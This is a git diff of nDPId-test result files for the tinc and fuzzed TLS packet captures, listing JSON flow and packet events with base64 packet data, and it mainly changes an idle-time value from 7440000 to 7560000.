{"4":"DPI"},"proto":"TINC","breed":"Acceptable","category":"VPN"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":42,"source":"tinc.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1495983428000,"flow_last_seen":1495983428000,"flow_idle_time":180000,"flow_min_l4_payload_len":644,"flow_max_l4_payload_len":644,"flow_tot_l4_payload_len":644,"flow_avg_l4_payload_len":644,"midstream":0,"thread_ts_msec":1495983428000,"l3_proto":"ip4","src_ip":"131.114.168.27","dst_ip":"185.83.218.112","src_port":55655,"dst_port":55655,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01302{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"tinc.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1495983428000,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":686,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":686,"pkt_l4_len":652,"thread_ts_msec":1495983428000,"pkt":"ABcILL3nACbGCvpSCABFAAKgAABAAEARePuDcqgbuVPacNln2WcCjOIVMnicz9ZajjNEbdb6GxVP+T0CYtKzdvwcc\/GkysPu2p+HyRNKFCh5wNXMj6m9vaZ39wOg\/SFDxkblUqiUmI5T0t6KnEjzK4HfVELTk6MBki+YvI91VjjOz3oekNHxmSbldeRnnKPd925mZ9lxMA3GG9gZmsCSn4wPwr41LS70gLZbanbUNnlN7x6Kh9gVM6JtlzGBIjbSf6B4epOKePy2xW4AQp4bPXtTf\/0OGkPuy5hSETaSFX43lK3JOI2urGuq\/8zhvAyKL4t3LDJwEcTmglCiHm1tbrVnkmBCUBidOZ0NL52X+MKzyHnGOwdAwfV4+3VKFFmQE8IO6WWoZ\/vYOzfj1XZjyXREui0IMCYkWnraOSjlBBxRPQ4DkdgtsHokBlbzUjfr8Ss8XpNaUoZaaRCYy8Kw3szJstqYEU2GPLD0+pg+X9RZcEt+NlU1dFprcf5TwwLwxVrUXlq0UN21vjPNjBpnc4JeghgRv\/VcYRefFyhIUgPMVrdpg5GrCB4JTq65maVpsTyfybYsJ+i42aA3YjBU5z0PIhvBUxoHrj9TxX5OiZvAe42wvflGvW6iHzGGkgjUXDRxjS28FvW05QZJMaG4nQLQu0v8AHNHzQKZciwh33gMV3VVc\/5ghMO+CpJHRRkAZ7mBJzHMFXodcVJsk6K\/2J54sUaiJ48wBzCUQaWI9+w9ancXV2nZd+EHodY95wdzarfbqW8B30M66dRT3RsX8ddjytNxLuW+ewDpuzxP\/dncf+l0Gbul3BZMq9q4XnRT0wDb7bXlR0N7oHMRyWJ2GHC0RV7IQnYGzB\/YDI0StaWXOcSFic4ZA5TwYmSAm0iGFMYJM8DJznOohvp1QzM="} 00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"tinc.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1495983428000,"flow_last_seen":1495983428000,"flow_idle_time":180000,"flow_min_l4_payload_len":644,"flow_max_l4_payload_len":644,"flow_tot_l4_payload_len":644,"flow_avg_l4_payload_len":644,"midstream":0,"thread_ts_msec":1495983428000,"l3_proto":"ip4","src_ip":"131.114.168.27","dst_ip":"185.83.218.112","src_port":55655,"dst_port":55655,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"TINC","breed":"Acceptable","category":"VPN"}} @@ -20,10 +20,10 @@ 00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"tinc.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1495983428043,"flow_last_seen":1495983428043,"flow_idle_time":180000,"flow_min_l4_payload_len":724,"flow_max_l4_payload_len":724,"flow_tot_l4_payload_len":724,"flow_avg_l4_payload_len":724,"midstream":0,"thread_ts_msec":1495983428043,"l3_proto":"ip4","src_ip":"185.83.218.112","dst_ip":"131.114.168.27","src_port":55656,"dst_port":55656,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"TINC","breed":"Acceptable","category":"VPN"}} 02392{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"tinc.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1495983428043,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1486,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1486,"pkt_l4_len":1452,"thread_ts_msec":1495983428043,"pkt":"ACbGCvpSABcILL3nCABFCAXAAABAADERhNO5U9pwg3KoG9lo2WgFrCCQQfVUKnrm4XUK3wfxxn8qlQ5ZlUxAsin94OmtvvCqeiNDv9hCgysXgIe\/Jwp6foEgyUgSLwbFE+jFX5EiTbzvLxw+eE+9kkIbIypcFMAA862am\/h5EhYX9oyZgZit\/ohLFdBZAd\/9piW+TIg1JYKUHUk24mSNhkzehqNGbaa8v1XNXvCAKUf+je80JL2ztiSjDNtOMrbTSNyuOyDQhbbpaRAakKCJ88rhmRVZWPpGUvSoCLUQLdy+ls4UP9VbLIv60yNlhG\/tIZF+Y9AgYJgNK7469NXCZUoHPgebmwGoSIBvEupGZ2HWMq5tD1YtSNLd5mdcZ4U6bdW57PJT8Mqpobu5nNKCEUTKU8fv54QllT27onCmdTrjSLU7i56qGCPKz8Pmgpd+4MU1sOXlteqk11G5kxvUePU9AHDMWVZcDsBw+8w6+Ab\/JxYo4ilYPsOkX7nL+VL0USjj5AuG8wFeeDnvZeQURQeN12MuZewRpRzkJa5jIqIQqHHvEIR3I+NlcYV0IJXsrpavQ6RSGtYmR7+94hoEShFxTK6D2mPtrdLiAqRfmJptPiSWLm5Mqo0iayfkgY6sd6M1vwIpwRPc0qQOtn1doDjup9IIauyzdANQF9x2voU4Z8dsvHyVyVE9VF\/Qdb\/Bbe15\/vrLpOF+cB00\/TXrJ07AVZHqEwel\/iScs2S9kgqiIjzb1T0G6y8xlHQV7ktrErMlC4GXnRqlxWayYa4G266nN6wc0wTy9MD7G5DpqxUPZwZIrxZiMHXc4mPXA210XTsNG7LVVQM581lStiGr1a4pUZOImjoO\/gk5frgMuu6jHFgEA+vJuy5sW5lQpb37IXQqFXKKxN2z8Ke+x4zy7ALHVigelzuNCf3HZfol1uD4eeP+2tpVITMiH4O5PCcLDMT1yYFhbvLg8pREkBITQB+rUBzFhHXEVteh6noPH6hIRkDIrLyfEHdswFs6MATwSlSxKkz0QuaSV8BEXCeHOM+JmmNRCgSmcHuzwrDdDGG7eSF7kzVOXV4KPQtBdbB4rq\/rFfGJFSiBXn2huFIeNdQhj4gFtDQIfYjXMsmhSsrScwjLj7C7jg2Rwm\/XuhfLgws3rBZC6s4ClAl8Lku7gDzAWOdYgK2FafJmEnZR3NXAFEI8JF5r5ITwwBATJADMcv7GO51VLOgFAuacu5w0kk1gxapzbHcSOdPeKJB+9voPecizTzqOKMuqIngnpb\/qfLXWqnLz7U6\/\/ui4aHgWF+lKp0xsjiPYD9YnVxFJE08oruybimAl5F4KHctwad6wrnqDh7AMDE3spgEO04z6pL2VZXL\/wvq6pxHL80kORMsGZgPOmyHtPCRE5Jd+RFgmwBejwRrNJFCuLc2P622GjZ1t\/hPuud14khvjnfHdyfKsl19iLyzwv7qu0oEoiwBrYf06g7MzcULZl4XUxJNSE9RYU15rJmRxguh4eXuIOqgIqrfkbI\/\/vDyBWYyc45utTloDIm+GnDiAeigtPF4FijLPE9qVDfQilPuHMnf6UDvllbgNqo19g3gnmLroqXep+7LyRYp4sWr4\/d\/TZKaCucaaCwVm1u\/1te\/n+aOftes5xygxK+OaKehbJ47nnj4GJRcueg7KFHNq2ES0Uj1Rh2+lhguZLWYwLh4\/FPK0vdBcca9l29F4kxSaDHn6BeoZpX+wivGn5jMTbID2EPugYpELm+yXQDHU1W7JBJkdRRhJfBWIKo8UZofXK4qgL2\/MqCqF2T2\/hEjt9sAO7DVGx2T23++65+kzCDH2qiAfrQdQFlN08V17FGkydmcJibPSSbSe7aLjPjiXuGdc7ip\/LMmiTS0sCJq6zHCBk5aHilHCEqmTl+eL9Q9vwrMeAdX+cTIhD7xTxK6aeGzriTEJFQi6+ZDkO2+SfJZlZhRSLhc55JEaOH4LdN2VABhAfw=="} 01675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"tinc.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1495983428043,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":958,"pkt_l4_len":924,"thread_ts_msec":1495983428043,"pkt":"ACbGCvpSABcILL3nCABFCAOwAABAADERhuO5U9pwg3KoG9lo2WgDnO+CxkvMU5czu375VqRfqLEu7HGryDGh\/bfeaQJnEYyovrmntDxt74C8PKQJMHvY4MA1ZHuHhnLJLLc7h764zEbGLw\/vzqsaP4XOJmX3J5ZoXTmAMsXnjvJUPqVeWdg0PXJhqa6st9hNynxv5D0rpJqm0\/zV192qcE59jCUVvmB8PfyMGzNb8iu7j79YvIHCzFHzmycvx5sIdKuzv+9aaD2+9O1fWAuPwq8\/8DIg8DeQB7htbL3\/j6lwDGupSOVHCsI1+lYyNr8A5\/OFujJsJCBzKGXQVn+oJRoQMsFgr0giRTOfhVQb+GlZOLXTcVvxl6mNiWSoDQXoxAfPuixrlp8F\/MUrFtVqJYJIqlWUSZ0FHJzKiXJ5yQvwNmnsvYHqMQNW6ZCn++1tGEto8r5tq\/BDe0FvMAOQC\/Iq49d9xjtHRJaZkPSuUT0Ue8\/0Y0g7e7MLBCNRDp3pFvP\/SDROeSBv+1Hrsd3VgZ3eZsdET6SE7O+jiB1npy8XRuCERu\/h5FlX8FbvbKHJP4IXbapoGYosv9tEU2XONo65wz3MCF\/bVbrUPcOASb6j+c55C5rFZMKjA9llC2lki+5ox8NX3C0rsVb9ezbzAq4pvwBxx6yeMVlmBhRxjwXLWviN6bjb8+kKUMxdeqvtFZ90hWLG3av8x5N1D1shhjp\/Pkh3vfzESwJoedvps7xxuR16c9ku4Rlje1SzPbiXWLLd2ctB3NoWHVeTFrvLRU2yqM5LNXQpjLOWYVqndimokWzm3PvfsX2+ickLKvqhiNB8NMbCQKKllVtQtaf37M0W3hxij8fNqkfQ3Dwvv36xYQY6aA2cxZJ7cAJfgWt3+2IqzsbQ\/hOa1lDnl8uliASJ4hjXOWhi4prZ86H1uoSeDR53SAlBdMQQ3YoaLSv6kQQOXAUwHuZQi7+x\/RE5HfoAvVeNzG90OcOnL2uiCxjhyp3\/swc9NGfoqhpvTPlS\/HF6E4gzQu+uwm3Kmj7AsKixik3ciIBb6VqLoyiaQR35wKSQydm3qyc2A8RxVwJEHM9ChZNid+PGF9MC3cdjsTP6IG4AOw3VS8jLQznT38vyJvgWelWwQ+I9gJ2zh8MbfaLP+EWNQPI478wMYlCsuyg5uNNDg0lSF1epToqo6+lky+h2nAa21hKOviRtVRN8LV88QPWbYJx4n3gM4sg9yVPde6y+bdl\/hYGe1J5JIAW7OGyTqN+C43dvapKXMw=="} -00821{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":317,"source":"tinc.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1495983427744,"flow_last_seen":1495983475109,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1039,"flow_tot_l4_payload_len":5390,"flow_avg_l4_payload_len":199,"midstream":0,"thread_ts_msec":1495983475109,"l3_proto":"ip4","src_ip":"131.114.168.27","dst_ip":"185.83.218.112","src_port":49290,"dst_port":55656,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TINC","breed":"Acceptable","category":"VPN"}} +00821{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":317,"source":"tinc.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1495983427744,"flow_last_seen":1495983475109,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1039,"flow_tot_l4_payload_len":5390,"flow_avg_l4_payload_len":199,"midstream":0,"thread_ts_msec":1495983475109,"l3_proto":"ip4","src_ip":"131.114.168.27","dst_ip":"185.83.218.112","src_port":49290,"dst_port":55656,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TINC","breed":"Acceptable","category":"VPN"}} 00834{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":317,"source":"tinc.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":130,"flow_first_seen":1495983428000,"flow_last_seen":1495983470973,"flow_idle_time":180000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":1468,"flow_tot_l4_payload_len":164056,"flow_avg_l4_payload_len":1261,"midstream":0,"thread_ts_msec":1495983475109,"l3_proto":"ip4","src_ip":"131.114.168.27","dst_ip":"185.83.218.112","src_port":55655,"dst_port":55655,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"TINC","breed":"Acceptable","category":"VPN"}} 00834{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":317,"source":"tinc.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":134,"flow_first_seen":1495983428043,"flow_last_seen":1495983463866,"flow_idle_time":180000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":1468,"flow_tot_l4_payload_len":164136,"flow_avg_l4_payload_len":1224,"midstream":0,"thread_ts_msec":1495983475109,"l3_proto":"ip4","src_ip":"185.83.218.112","dst_ip":"131.114.168.27","src_port":55656,"dst_port":55656,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"TINC","breed":"Acceptable","category":"VPN"}} -00821{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":317,"source":"tinc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1495983427717,"flow_last_seen":1495983475073,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1039,"flow_tot_l4_payload_len":4647,"flow_avg_l4_payload_len":178,"midstream":0,"thread_ts_msec":1495983475109,"l3_proto":"ip4","src_ip":"131.114.168.27","dst_ip":"185.83.218.112","src_port":59244,"dst_port":55655,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TINC","breed":"Acceptable","category":"VPN"}} +00821{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":317,"source":"tinc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1495983427717,"flow_last_seen":1495983475073,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1039,"flow_tot_l4_payload_len":4647,"flow_avg_l4_payload_len":178,"midstream":0,"thread_ts_msec":1495983475109,"l3_proto":"ip4","src_ip":"131.114.168.27","dst_ip":"185.83.218.112","src_port":59244,"dst_port":55655,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TINC","breed":"Acceptable","category":"VPN"}} 00555{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":317,"source":"tinc.pcap","alias":"nDPId-test","packets-captured":317,"packets-processed":317,"total-skipped-flows":0,"total-l4-data-len":338229,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":4,"total-idle-flows":4,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":27,"global_ts_msec":1495983475109} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 317/317 diff --git a/test/results/tls-esni-fuzzed.pcap.out b/test/results/tls-esni-fuzzed.pcap.out index 4a224bd12..79934b065 100644 --- a/test/results/tls-esni-fuzzed.pcap.out +++ b/test/results/tls-esni-fuzzed.pcap.out @@ -1,17 +1,17 @@ 00466{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00552{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1590680386576} -00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680386576,"flow_last_seen":1590680386576,"flow_idle_time":7440000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680386576,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.27.129.77","src_port":49886,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -01424{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1590680386576,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":770,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":770,"pkt_l4_len":736,"thread_ts_msec":1590680386576,"pkt":"EBMx8Tl2KDc3AG3ICABFAAL0AABAAEAGjOfAqAEMaBuBTcLeAbt3Q5LX\/48DFVAYIACwHgAAFgMBAscBAALDAwOTwM86TEdZaYZx77QiKeLaOUyI6FPS+J3L+0S3MA31OCDtrXy2AkmiC5EC8aXH8NKs5TG5ofTGvlsmIWUcTFlOhgAkEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAMwA5AC8ANQAKAQACVgAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAMwBrAGkAHQAg9C+VXLX0pUAYcvwRMlm2BfjMFL+A2Ha+teHeYm8XszAAFwBBBKhP+5j\/iIqKULsVEv1xkLdgIoxwczB5EVKfTq\/0aLaIOqqUx255GoGIKzaHGdYeWvgG2FTscntynOjMKiH+1xMAKwAJCAMEAwMDAgMBAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAf\/OAW4TAQAdACAoJey8d6KdccaSJO2lCYt20kw0EEYFyldVNE\/b+wVlLQAgHyQSymUyoBaYNvGbjOJlOzPcW4r7yiRdTxErCb+vUsgBJJYkyzxOIwgn94z1v2QNIt6jP8xZjqajLZOZBVhvvpl7nmhmH4lW1IkwcuGd4kzR+4ip9x\/EzAG6tckU\/flqZH1nG16JhZuu6rEiIYaISW303wwyjD1flAsQnOsqJ0PVy+NZQoiiKbjH4viDA+P+GiaonlAB8r2TaJD+948G4F7MBjpovbjBjfrBFM8f7NuL4fwv7ssjFdJ5mNaCsSn9Hj6115hdy9xFKhCCzMA44L9pVw\/vrGvG+5UfibZ5LK2nZAPALOtdzhzm7d0W1ff7a4XSuSSFRI3gCI5CHoPx4osmf747Wa4ElvuEUhPCcdTFrF6efl9qMHJEUwf8zrcwZxBFmZHEDMTcH8MlFUx5dN14A3E5eAVFahmuI+6IR1wd8HaXtmYAHAACQAE="} -00902{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680386576,"flow_last_seen":1590680386576,"flow_idle_time":7440000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680386576,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.27.129.77","src_port":49886,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"957015a0b1e2500d8777219893a09495","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680387847,"flow_last_seen":1590680387847,"flow_idle_time":7440000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680387847,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.16.125.175","src_port":49887,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -01428{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1590680387847,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":770,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":770,"pkt_l4_len":736,"thread_ts_msec":1590680387847,"pkt":"EBMx8Tl2KDc3AG3ICABFAAL0AABAAEAGkJDAqAEMaBB9r8LfAbu98X4VZuCG7lAYIACqfgAAFgMBAscBAALDAwPZvt6xqK7JiSO2eRBioUk2Uu867QdPWpn6Sv4hYS472iAz8c+AKNafKEsBeorsjdYMXk2HdHvKJL23Af8gga\/qxAAkEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAMwA5AC8ANQAKAQACVgAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAMwBrAGkAHQAg0HCVKAanlLS9J1B8hdchDfkoKDxcPc3B5hBZYsZWdz8AFwBBBCakAur\/e3rF+tGl0au7NOTY4DQpBg\/YjV6ew74w8otvaCGiCdoeWGhEGjsldqwZrBxN3o59i8BSdRX+YPQ+GgkAKwAJCAMEAwMDAgMBAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAf\/OAW4TAQAdACAFyK2kXV21yqtAW2T62b\/NDTnJgxOrhECle3qcjynhZQAgHyQSymUyoBaYNvGbjOJlOzPcW4r7yiRdTxErCb+vUsgBJLkAAE456EuY9a6HsKAg7En+2G8rSItqsoven5V2IfJ3Q2bekOZcTKgIZokRYkaF7ExtxsFhqXy+gigbwIQnaXqjvmpA5fAKz4tj4ykxew5OhWQtUKuHkOYZfaYtn1syOdzFlDd5f+dopSDJ1HH+q6E3XfYeSjmwk2PLEJ57JKeThEiW3dFrbufb5XbXZxYdeC179v7EU6Bakj2Njpvv\/Jfo5WxPGqtw\/pm8l4GeHZCKXzswlPS\/Jet6JKlP28PhB6QjuLs0HyKQD3u9h3gOMLbs85P+uPv\/61THn6BnP+Gq0XsiHUv\/ZFCqDNSvUTBmtmCAtgIUfzrLcUWkNsVonaILrLi\/m6vYUQElVuyPe7nXS\/qvJdz0NipXdWB8POXCwp8YOWkAHAACQAE="} -00903{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680387847,"flow_last_seen":1590680387847,"flow_idle_time":7440000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680387847,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.16.125.175","src_port":49887,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"957015a0b1e2500d8777219893a09495","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680391590,"flow_last_seen":1590680391590,"flow_idle_time":7440000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.22.71.197","src_port":49897,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -01422{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tls-esni-fuzzed.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1590680391590,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":770,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":770,"pkt_l4_len":736,"thread_ts_msec":1590680391590,"pkt":"EBMx8Tl2KDc3AG3ICABFAAL0AABAAEAGxnTAqAEMaBZHxcLpAbsLJg40SW6gUlAYIAANXgAAFgMBAscBAALDAwMJLl9l\/OldUJYbpqd0xOpts3Kv4zg2hroTXcdX9KeB2CBjkfBVUTqX532YPuVZHQd0J5lIK2OZH9nsSRBnWwKDWwAkEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAMwA5AC8ANQAKAQACVgAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAMwBrAGkAHQAgsbxhJX9IcnjB7rdgEb2YIBohnnxEhKIToNk1er8CIioAFwBBBLtlLNXLCuP0okhISXwuyj6tgeyLGZ5yaSZ9uT3zAbum2y5l1gYjS6RGBBL9dNcuY2pA4Ze582sOuuo0cAvw2TsAKwAJCAMEAwMDAgMBAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAf\/OAW4TAQAdACCgcq\/jSZGFwhXJHl9nfU84W9RHblecX+XHXi+knd++egAgHyQSymUyoBaYNvGbjOJlOzPcW4r7yiRdTxErCb+vUjmwk2PLEJ57JKeThEiW3dFrbufb5XbXZxYdeC179v7EU6Bakj2Njpvv\/Jfo5WxPGqtwjTPLrxKpdN+3jkm4v5pXmXQY7xTIeDCWHjyEgNKkvyfWHZEc70MAkkqfNhBXSLrthF\/1heQEBlRbs1xtqteJZDPsTf1rb0lyjahdcH23rHhPVaZljcat4wh7Hka7vt+kTz6HVLMaa8+FGdKR02KYBfqCbkN5nqbjMCHPCoPKBXF7APN9aYQZNPW1vyVMZGeIilksOKMAfbO31cu423QrZX+PlzwFC6qBeqVxOTzYpLwLIxJGCnfdBRD0u85D1TvPM05OjHVwJVu9F3FEA\/S2klQ0zWf5b6ngXXAHdoEO61eGscgYik1z+CCLYUuTKEqAk5KVlL4AHAACQAE="} 